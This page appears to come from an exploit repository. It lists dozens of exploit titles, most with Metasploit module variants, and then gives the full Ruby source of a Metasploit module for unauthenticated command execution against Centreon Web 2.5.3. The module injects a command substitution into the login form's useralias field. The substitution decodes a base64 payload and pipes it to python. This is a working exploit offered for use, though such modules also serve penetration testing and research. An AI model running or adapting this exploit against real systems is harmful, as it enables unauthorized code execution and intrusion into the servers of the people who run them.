Final Draft 8 - Multiple Stack Buffer Overflows
AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit)
Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)

StoryBoard Quick 6 - Stack Buffer Overflow
StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)

phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection
phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit)

vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit
vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)

The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution
The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit)

Liferay XSL - Command Execution
Liferay XSL - Command Execution (Metasploit)

CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit
CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit (Metasploit)

Wyse - Machine Remote Power off (DOS) without any privilege
Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit)

TFM MMPlayer (m3u/ppl File) Buffer Overflow
TFM MMPlayer (.m3u/.ppl) Buffer Overflow

Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow
Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit)

WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal
WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal (Metasploit)

ALLMediaServer 0.8 SEH Overflow Exploit
ALLMediaServer 0.8 - SEH Overflow Exploit
Siemens Simatic S7-300/400 CPU START/STOP Module
Siemens Simatic S7-300 PLC Remote Memory Viewer
Siemens Simatic S7-1200 CPU START/STOP Module
Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit)
Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)
Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow
Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)

Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit
Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)

Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit
Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit)

NetWin SurgeFTP Authenticated Admin Command Injection
NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)

ActFax 5.01 - RAW Server Exploit
ActFax 5.01 - RAW Server Exploit (Metasploit)

Polycom HDX Telnet Authorization Bypass
Polycom HDX Telnet Authorization Bypass (Metasploit)

Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)
Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) (Metasploit)

Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution
Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)

Mikrotik Syslog Server for Windows 1.15 - Denial of Service
Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)

SAP ConfigServlet OS Command Execution
SAP ConfigServlet OS Command Execution (Metasploit)

SAP ConfigServlet Remote Unauthenticated Payload Execution
SAP ConfigServlet Remote Unauthenticated Payload Execution (Metasploit)

Microsoft Internet Explorer textNode Use-After-Free
Microsoft Internet Explorer textNode Use-After-Free (Metasploit)

Java Web Start Double Quote Injection Remote Code Execution
Java Web Start Double Quote Injection Remote Code Execution (Metasploit)

OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution
OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit)

Zabbix 2.0.8 - SQL Injection / Remote Code Execution
Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)

SikaBoom - Remote Buffer Overflow
SikaBoom - Remote Buffer Overflow (Metasploit)

Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass
Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit)

VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow (DEP Bypass)

Netgear WNR1000v3 - Password Recovery Credential Disclosure
Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)

Easy CD-DA Recorder - (PLS File) Buffer Overflow
Easy CD-DA Recorder - (.pls) Buffer Overflow

Fitnesse Wiki - Remote Command Execution
Fitnesse Wiki - Remote Command Execution (Metasploit)

EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read
EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)

AlienVault 4.5.0 - Authenticated SQL Injection
AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)

Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE
Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit)

F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation
F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)

AlienVault OSSIM 4.6.1 - Authenticated SQL Injection
AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)

Raritan PowerIQ 4.1.0 - SQL Injection
Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)

Mthree Development MP3 to WAV Decoder - (.mp3 File) Remote Buffer Overflow
Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow

ManageEngine Password Manager MetadataServlet.dat SQL Injection
ManageEngine Password Manager MetadataServlet.dat SQL Injection (Metasploit)

Ammyy Admin 3.5 - RCE
Ammyy Admin 3.5 - RCE (Metasploit)

Microsoft Exchange IIS HTTP Internal IP Address Disclosure
Microsoft Exchange IIS HTTP Internal IP Address Disclosure (Metasploit)

ManageEngine OpManager / Social IT Arbitrary File Upload
ManageEngine OpManager / Social IT Arbitrary File Upload (Metasploit)

DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload
DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)
Device42 WAN Emulator 2.3 - Traceroute Command Injection
Device42 WAN Emulator 2.3 - Ping Command Injection
Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)
Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)

Microsoft Windows Media Player 11.0.5721.5145 - (.avi File) Buffer Overflow
Microsoft Windows Media Player 11.0.5721.5145 - (.avi) Buffer Overflow

Varnish Cache CLI Interface - Remote Code Execution
Varnish Cache CLI Interface - Remote Code Execution (Metasploit)

Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE
Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE (Metasploit)

OpenMyZip 0.1 - (.zip File) Buffer Overflow
OpenMyZip 0.1 - (.zip) Buffer Overflow

Persistent Systems Client Automation - Command Injection RCE
Persistent Systems Client Automation - Command Injection RCE (Metasploit)

Metasploit Project < 4.11.1 - Initial User Creation CSRF
Metasploit Project < 4.11.1 - Initial User Creation CSRF (Metasploit)

Exim GHOST (glibc gethostbyname) Buffer Overflow
Exim GHOST (glibc gethostbyname) Buffer Overflow (Metasploit)
QNAP - Admin Shell via Bash Environment Variable Code Injection
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)

WordPress Business Intelligence Plugin - SQL injection
WordPress Business Intelligence Plugin - SQL injection (Metasploit)

Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit
Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)

PDF Shaper 3.5 - Buffer Overflow
PDF Shaper 3.5 - Buffer Overflow (Metasploit)

Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection
Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)

Centreon <= 2.5.3 - Remote Command Execution
Centreon 2.5.3 - Remote Command Execution

Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure (Metasploit)

Meteocontrol WEB’log - Admin Password Disclosure
Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)

VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)
VUPlayer 2.49 - (.m3u) Buffer Overflow Exploit (Win 7 DEP Bypass)
VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)
2016-07-28 05:03:16 +00:00

89 lines
No EOL
2.7 KiB
Ruby
Executable file
Raw Blame History

##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Centreon Web Useralias Command Execution',
'Description' => %q(
Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
errors. This functionality can be abused for arbitrary code
execution, and can be triggered via the login screen prior to
authentication.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
],
'References' =>
[
[ 'EDB', '39501' ]
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Privileged' => false,
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 26 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
/LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
vprint_status('Sending malicious login')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' =>
{
'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
'password' => Rex::Text.rand_text_alpha(5)
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
Reference in a new issue View git blame Copy permalink